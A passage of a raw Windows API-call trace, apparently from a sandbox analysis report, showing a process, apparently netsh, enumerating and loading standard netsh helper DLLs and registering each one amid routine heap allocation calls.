0x410000 [0094.828] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8c) returned 0x431a38 [0094.828] GetProcessHeap () returned 0x410000 [0094.828] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x436b80 [0094.828] GetProcessHeap () returned 0x410000 [0094.828] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x432de8 [0094.828] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0094.828] GetProcessHeap () returned 0x410000 [0094.828] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x420218 | out: hHeap=0x410000) returned 1 [0094.828] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x71970000 [0095.237] GetProcAddress (hModule=0x71970000, lpProcName="InitHelperDll") returned 0x71972a30 [0095.238] InitHelperDll () returned 0x0 [0095.238] RegisterHelper () returned 0x0 [0095.238] GetProcessHeap () returned 0x410000 [0095.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x360) returned 0x439e40 [0095.238] GetProcessHeap () returned 0x410000 [0095.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x437320 | out: hHeap=0x410000) returned 1 [0095.238] RegEnumValueW (in: hKey=0xac, dwIndex=0x6, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="authfwcfg", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0095.238] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0095.238] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0095.238] GetProcessHeap () returned 0x410000 [0095.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x435500 [0095.238] GetProcessHeap () returned 0x410000 [0095.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x432e08 [0095.238] GetProcessHeap () returned 0x410000 [0095.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x439680 [0095.238] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0095.238] GetProcessHeap () returned 0x410000 [0095.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431a38 | out: hHeap=0x410000) returned 1 [0095.238] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x71890000 [0095.991] GetProcAddress (hModule=0x71890000, lpProcName="InitHelperDll") returned 0x71894420 [0095.991] InitHelperDll () returned 0x0 [0096.042] RegisterHelper () returned 0x0 [0096.042] GetProcessHeap () returned 0x410000 [0096.042] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3a8) returned 0x43a958 [0096.042] GetProcessHeap () returned 0x410000 [0096.042] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x439e40 | out: hHeap=0x410000) returned 1 [0096.042] RegisterHelper () returned 0x0 [0096.042] GetProcessHeap () returned 0x410000 [0096.042] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3f0) returned 0x43ad08 [0096.042] GetProcessHeap () returned 0x410000 [0096.042] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43a958 | out: hHeap=0x410000) returned 1 [0096.042] RegisterHelper () returned 0x0 [0096.042] GetProcessHeap () returned 0x410000 [0096.042] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x438) returned 0x43b100 [0096.042] GetProcessHeap () returned 0x410000 [0096.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43ad08 | out: hHeap=0x410000) returned 1 [0096.043] RegisterHelper () returned 0x0 [0096.043] GetProcessHeap () returned 0x410000 [0096.043] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x480) returned 0x43a958 [0096.043] GetProcessHeap () returned 0x410000 [0096.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43b100 | out: hHeap=0x410000) returned 1 [0096.043] RegisterHelper () returned 0x0 [0096.043] GetProcessHeap () returned 0x410000 [0096.043] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c8) returned 0x43ade0 [0096.043] GetProcessHeap () returned 0x410000 [0096.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43a958 | out: hHeap=0x410000) returned 1 [0096.043] RegEnumValueW (in: hKey=0xac, dwIndex=0x7, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="2", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0096.043] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0096.043] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0096.043] GetProcessHeap () returned 0x410000 [0096.043] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb4) returned 0x4355a8 [0096.043] GetProcessHeap () returned 0x410000 [0096.043] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4) returned 0x427f00 [0096.043] GetProcessHeap () returned 0x410000 [0096.043] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x432ec8 [0096.043] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0096.043] GetProcessHeap () returned 0x410000 [0096.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x435500 | out: hHeap=0x410000) returned 1 [0096.044] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x71860000 [0096.438] GetProcAddress (hModule=0x71860000, lpProcName="InitHelperDll") returned 0x718617a3 [0096.438] InitHelperDll () returned 0x0 [0096.438] RegisterHelper () returned 0x0 [0096.438] GetProcessHeap () returned 0x410000 [0096.438] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x510) returned 0x43b2b0 [0096.438] GetProcessHeap () returned 0x410000 [0096.438] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43ade0 | out: hHeap=0x410000) returned 1 [0096.439] RegEnumValueW (in: hKey=0xac, dwIndex=0x8, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="netiohlp", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0096.439] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0096.439] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0096.439] GetProcessHeap () returned 0x410000 [0096.439] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc8) returned 0x4368f0 [0096.439] GetProcessHeap () returned 0x410000 [0096.439] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x432fe8 [0096.439] GetProcessHeap () returned 0x410000 [0096.439] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x439d60 [0096.439] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0096.439] GetProcessHeap () returned 0x410000 [0096.439] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4355a8 | out: hHeap=0x410000) returned 1 [0096.439] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x71800000 [0097.060] GetProcAddress (hModule=0x71800000, lpProcName="InitHelperDll") returned 0x71816e4b [0097.060] InitHelperDll () returned 0x0 [0097.060] RegisterHelper () returned 0x0 [0097.060] GetProcessHeap () returned 0x410000 [0097.060] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x558) returned 0x43bfc8 [0097.061] GetProcessHeap () returned 0x410000 [0097.061] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43b2b0 | out: hHeap=0x410000) returned 1 [0097.061] RegisterHelper () returned 0x0 [0097.061] GetProcessHeap () returned 0x410000 [0097.061] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5a0) returned 0x43b1c0 [0097.061] GetProcessHeap () returned 0x410000 [0097.061] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43bfc8 | out: hHeap=0x410000) returned 1 [0097.061] RegisterHelper () returned 0x0 [0097.061] GetProcessHeap () returned 0x410000 [0097.061] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5e8) returned 0x43bfc8 [0097.061] GetProcessHeap () returned 0x410000 [0097.061] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43b1c0 | out: hHeap=0x410000) returned 1 [0097.061] RegisterHelper () returned 0x0 [0097.061] GetProcessHeap () returned 0x410000 [0097.061] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x630) returned 0x43c5b8 [0097.061] GetProcessHeap () returned 0x410000 [0097.061] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43bfc8 | out: hHeap=0x410000) returned 1 [0097.061] RegisterHelper () returned 0x0 [0097.061] GetProcessHeap () returned 0x410000 [0097.061] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x678) returned 0x43cbf0 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43c5b8 | out: hHeap=0x410000) returned 1 [0097.062] RegisterHelper () returned 0x0 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6c0) returned 0x43bfc8 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43cbf0 | out: hHeap=0x410000) returned 1 [0097.062] RegisterHelper () returned 0x0 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x708) returned 0x43c690 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43bfc8 | out: hHeap=0x410000) returned 1 [0097.062] RegisterHelper () returned 0x0 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x750) returned 0x43cda0 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43c690 | out: hHeap=0x410000) returned 1 [0097.062] RegisterHelper () returned 0x0 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x798) returned 0x43d4f8 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43cda0 | out: hHeap=0x410000) returned 1 [0097.062] RegEnumValueW (in: hKey=0xac, dwIndex=0x9, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="whhelper", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0097.062] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0097.062] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdc) returned 0x435568 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x433008 [0097.062] GetProcessHeap () returned 0x410000 [0097.062] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x43b858 [0097.062] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0097.063] GetProcessHeap () returned 0x410000 [0097.063] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4368f0 | out: hHeap=0x410000) returned 1 [0097.063] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x717a0000 [0097.552] GetProcAddress (hModule=0x717a0000, lpProcName="InitHelperDll") returned 0x717a1c99 [0097.552] InitHelperDll () returned 0x0 [0097.552] RegisterHelper () returned 0x0 [0097.552] GetProcessHeap () returned 0x410000 [0097.553] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7e0) returned 0x43bfc8 [0097.553] GetProcessHeap () returned 0x410000 [0097.553] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d4f8 | out: hHeap=0x410000) returned 1 [0097.553] RegEnumValueW (in: hKey=0xac, dwIndex=0xa, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="hnetmon", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0097.553] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0097.553] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0097.553] GetProcessHeap () returned 0x410000 [0097.553] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x4368f0 [0097.553] GetProcessHeap () returned 0x410000 [0097.553] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43b120 [0097.553] GetProcessHeap () returned 0x410000 [0097.553] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x433028 [0097.553] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0097.553] GetProcessHeap () returned 0x410000 [0097.553] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x435568 | out: hHeap=0x410000) returned 1 [0097.553] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x716e0000 [0098.688] GetProcAddress (hModule=0x716e0000, lpProcName="InitHelperDll") returned 0x716e200c [0098.688] InitHelperDll () returned 0x0 [0098.688] RegisterHelper () returned 0x0 [0098.688] GetProcessHeap () returned 0x410000 [0098.688] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x828) returned 0x43c7b0 [0098.688] GetProcessHeap () returned 0x410000 [0098.688] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43bfc8 | out: hHeap=0x410000) returned 1 [0098.688] RegEnumValueW (in: hKey=0xac, dwIndex=0xb, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="rpc", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0098.688] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0098.688] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0098.688] GetProcessHeap () returned 0x410000 [0098.688] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x104) returned 0x4369e8 [0098.688] GetProcessHeap () returned 0x410000 [0098.688] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427f70 [0098.688] GetProcessHeap () returned 0x410000 [0098.688] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16) returned 0x433048 [0098.688] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0098.688] GetProcessHeap () returned 0x410000 [0098.688] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4368f0 | out: hHeap=0x410000) returned 1 [0098.688] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x71450000 [0098.834] GetProcAddress (hModule=0x71450000, lpProcName="InitHelperDll") returned 0x71452f94 [0098.834] InitHelperDll () returned 0x0 [0098.834] RegisterHelper () returned 0x0 [0098.834] GetProcessHeap () returned 0x410000 [0098.834] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x870) returned 0x43cfe0 [0098.834] GetProcessHeap () returned 0x410000 [0098.834] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43c7b0 | out: hHeap=0x410000) returned 1 [0098.834] RegisterHelper () returned 0x0 [0098.834] GetProcessHeap () returned 0x410000 [0098.834] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8b8) returned 0x43bfc8 [0098.834] GetProcessHeap () returned 0x410000 [0098.834] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43cfe0 | out: hHeap=0x410000) returned 1 [0098.835] RegEnumValueW (in: hKey=0xac, dwIndex=0xc, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="dot3cfg", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0098.835] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0098.835] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0098.835] GetProcessHeap () returned 0x410000 [0098.835] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x118) returned 0x437320 [0098.835] GetProcessHeap () returned 0x410000 [0098.835] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43b490 [0098.835] GetProcessHeap () returned 0x410000 [0098.835] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x433068 [0098.835] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0098.835] GetProcessHeap () returned 0x410000 [0098.835] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4369e8 | out: hHeap=0x410000) returned 1 [0098.835] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x71430000 [0102.400] GetProcAddress (hModule=0x71430000, lpProcName="InitHelperDll") returned 0x7143a31d [0102.400] InitHelperDll () returned 0x0 [0102.400] RegisterHelper () returned 0x0 [0102.400] GetProcessHeap () returned 0x410000 [0102.401] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x900) returned 0x43d488 [0102.401] GetProcessHeap () returned 0x410000 [0102.401] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43bfc8 | out: hHeap=0x410000) returned 1 [0102.401] RegEnumValueW (in: hKey=0xac, dwIndex=0xd, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="napmontr", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0102.401] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0102.401] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0102.401] GetProcessHeap () returned 0x410000 [0102.401] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12c) returned 0x437440 [0102.401] GetProcessHeap () returned 0x410000 [0102.401] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x433088 [0102.401] GetProcessHeap () returned 0x410000 [0102.401] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x43cf98 [0102.401] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0102.401] GetProcessHeap () returned 0x410000 [0102.401] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x437320 | out: hHeap=0x410000) returned 1 [0102.401] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x71210000 [0106.562] GetProcAddress (hModule=0x71210000, lpProcName="InitHelperDll") returned 0x7121c7d5 [0106.562] InitHelperDll () returned 0x0 [0106.562] RegisterHelper () returned 0x0 [0106.562] GetProcessHeap () returned 0x410000 [0106.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x948) returned 0x43e590 [0106.562] GetProcessHeap () returned 0x410000 [0106.562] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d488 | out: hHeap=0x410000) returned 1 [0106.562] RegisterHelper () returned 0x0 [0106.562] GetProcessHeap () returned 0x410000 [0106.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x990) returned 0x43eee0 [0106.563] GetProcessHeap () returned 0x410000 [0106.563] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e590 | out: hHeap=0x410000) returned 1 [0106.563] RegisterHelper () returned 0x0 [0106.563] GetProcessHeap () returned 0x410000 [0106.563] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9d8) returned 0x43f878 [0106.563] GetProcessHeap () returned 0x410000 [0106.563] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43eee0 | out: hHeap=0x410000) returned 1 [0106.563] RegEnumValueW (in: hKey=0xac, dwIndex=0xe, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="nshipsec", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0106.563] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0106.563] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0106.563] GetProcessHeap () returned 0x410000 [0106.563] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x140) returned 0x43c4f0 [0106.563] GetProcessHeap () returned 0x410000 [0106.563] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x4330c8 [0106.564] GetProcessHeap () returned 0x410000 [0106.564] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x43de48 [0106.564] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0106.564] GetProcessHeap () returned 0x410000 [0106.564] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x437440 | out: hHeap=0x410000) returned 1 [0106.564] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x71cb0000 [0108.949] GetProcAddress (hModule=0x71cb0000, lpProcName="InitHelperDll") returned 0x71cb6910 [0108.949] InitHelperDll () returned 0x0 [0108.949] RegisterHelper () returned 0x0 [0108.949] GetProcessHeap () returned 0x410000 [0108.949] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa20) returned 0x442258 [0108.949] GetProcessHeap () returned 0x410000 [0108.949] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f878 | out: hHeap=0x410000) returned 1 [0108.949] RegisterHelper () returned 0x0 [0108.949] GetProcessHeap () returned 0x410000 [0108.949] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa68) returned 0x43f590 [0108.950] GetProcessHeap () returned 0x410000 [0108.950] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x442258 | out: hHeap=0x410000) returned 1 [0108.950] RegisterHelper () returned 0x0 [0108.950] GetProcessHeap () returned 0x410000 [0108.950] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xab0) returned 0x442258 [0108.950] GetProcessHeap () returned 0x410000 [0108.950] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f590 | out: hHeap=0x410000) returned 1 [0108.976] RegEnumValueW (in: hKey=0xac, dwIndex=0xf, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="p2pnetsh", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0108.976] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0108.976] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0108.976] GetProcessHeap () returned 0x410000 [0108.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x154) returned 0x43d958 [0108.976] GetProcessHeap () returned 0x410000 [0108.976] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x43f668 [0108.976] GetProcessHeap () returned 0x410000 [0108.977] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x4430b8 [0108.977] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0108.977] GetProcessHeap () returned 0x410000 [0108.977] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43c4f0 | out: hHeap=0x410000) returned 1 [0108.977] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x71c80000 [0110.147] GetProcAddress (hModule=0x71c80000, lpProcName="InitHelperDll") returned 0x71c838e5 [0110.147] InitHelperDll () returned 0x0 [0110.147] RegisterHelper () returned 0x0 [0110.147] GetProcessHeap () returned 0x410000 [0110.147] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaf8) returned 0x448fc8 [0110.148] GetProcessHeap () returned 0x410000 [0110.148] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x442258 | out: hHeap=0x410000) returned 1 [0110.148] RegisterHelper () returned 0x0 [0110.148] GetProcessHeap () returned 0x410000 [0110.148] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb40) returned 0x449ac8 [0110.148] GetProcessHeap () returned 0x410000 [0110.148] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x448fc8 | out: hHeap=0x410000) returned 1 [0110.148] RegisterHelper () returned 0x0 [0110.148] GetProcessHeap () returned 0x410000 [0110.148] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb88) returned 0x44a610 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449ac8 | out: hHeap=0x410000) returned 1 [0110.149] RegisterHelper () returned 0x0 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xbd0) returned 0x44b1a0 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44a610 | out: hHeap=0x410000) returned 1 [0110.149] RegisterHelper () returned 0x0 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc18) returned 0x448fc8 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44b1a0 | out: hHeap=0x410000) returned 1 [0110.149] RegisterHelper () returned 0x0 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc60) returned 0x449be8 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x448fc8 | out: hHeap=0x410000) returned 1 [0110.149] RegisterHelper () returned 0x0 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xca8) returned 0x44a850 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0110.149] RegisterHelper () returned 0x0 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcf0) returned 0x448fc8 [0110.149] GetProcessHeap () returned 0x410000 [0110.149] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44a850 | out: hHeap=0x410000) returned 1 [0110.150] RegisterHelper () returned 0x0 [0110.150] GetProcessHeap () returned 0x410000 [0110.150] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd38) returned 0x449cc0 [0110.150] GetProcessHeap () returned 0x410000 [0110.150] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x448fc8 | out: hHeap=0x410000) returned 1 [0110.150] RegisterHelper () returned 0x0 [0110.150] GetProcessHeap () returned 0x410000 [0110.150] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd80) returned 0x44aa00 [0110.150] GetProcessHeap () returned 0x410000 [0110.150] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449cc0 | out: hHeap=0x410000) returned 1 [0110.150] RegEnumValueW (in: hKey=0xac, dwIndex=0x10, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="wlancfg", lpcchValueName=0x3d77c8, lpType=0x0, 